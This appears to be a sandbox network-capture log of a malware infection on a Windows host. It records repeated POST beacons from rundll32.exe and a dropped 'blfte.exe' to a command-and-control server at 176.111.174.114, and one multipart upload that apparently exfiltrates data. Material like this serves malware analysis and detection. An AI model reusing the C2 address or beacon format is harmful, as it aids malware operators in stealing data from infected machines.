                                                                                                                                          Apr 28, 2021 22:59:47.118421078 CEST | 6700 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          231 | 176.111.174.114 | 80 | 192.168.2.4 | 49884 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:47.220776081 CEST | 6701 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:47 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          232 | 192.168.2.4 | 49885 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:47.437123060 CEST | 6701 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          233 | 176.111.174.114 | 80 | 192.168.2.4 | 49885 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:47.540241003 CEST | 6702 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:47 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          234 | 192.168.2.4 | 49886 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:47.752851963 CEST | 6702 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          235 | 176.111.174.114 | 80 | 192.168.2.4 | 49886 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:47.856725931 CEST | 6703 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:47 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          236 | 192.168.2.4 | 49887 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:48.067327023 CEST | 6706 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          237 | 176.111.174.114 | 80 | 192.168.2.4 | 49887 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:48.164905071 CEST | 6707 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:48 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          238 | 192.168.2.4 | 49888 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:48.377612114 CEST | 6709 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          239 | 192.168.2.4 | 49889 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:48.441199064 CEST | 6723 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.4 | 49760 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:13.224731922 CEST | 4533 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
240 | 176.111.174.114 | 80 | 192.168.2.4 | 49888 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:48.481601000 CEST | 6724 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:48 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
241 | 192.168.2.4 | 49890 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:48.693478107 CEST | 6807 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
242 | 176.111.174.114 | 80 | 192.168.2.4 | 49890 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:48.797477007 CEST | 6913 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:48 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
243 | 176.111.174.114 | 80 | 192.168.2.4 | 49889 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:48.943039894 CEST | 6944 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:48 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
244 | 192.168.2.4 | 49891 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:49.008996010 CEST | 6945 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
245 | 176.111.174.114 | 80 | 192.168.2.4 | 49891 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:49.113667965 CEST | 6947 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:49 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
246 | 192.168.2.4 | 49893 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:49.342708111 CEST | 6949 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
247 | 176.111.174.114 | 80 | 192.168.2.4 | 49893 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:49.455008984 CEST | 6950 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:49 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          248 | 192.168.2.4 | 49894 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:49.676522970 CEST | 6952 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          249 | 176.111.174.114 | 80 | 192.168.2.4 | 49894 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:49.775759935 CEST | 6953 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:49 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          25 | 176.111.174.114 | 80 | 192.168.2.4 | 49760 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:13.324136019 CEST | 4533 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:13 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          250 | 192.168.2.4 | 49895 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:49.993475914 CEST | 6956 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          251 | 176.111.174.114 | 80 | 192.168.2.4 | 49895 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:50.100819111 CEST | 6957 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:50 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          252 | 192.168.2.4 | 49896 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:50.317758083 CEST | 6959 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          253 | 176.111.174.114 | 80 | 192.168.2.4 | 49896 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:50.415971041 CEST | 6961 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:50 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          254 | 192.168.2.4 | 49901 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:50.723227978 CEST | 6964 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          255 | 176.111.174.114 | 80 | 192.168.2.4 | 49901 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:50.825123072 CEST | 6977 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:50 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          256 | 192.168.2.4 | 49904 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:51.050751925 CEST | 6978 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          257 | 176.111.174.114 | 80 | 192.168.2.4 | 49904 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:51.156960964 CEST | 6984 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:51 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          258 | 192.168.2.4 | 49905 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:51.847280979 CEST | 8013 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          259 | 176.111.174.114 | 80 | 192.168.2.4 | 49905 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:51.951944113 CEST | 8013 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:51 GMT
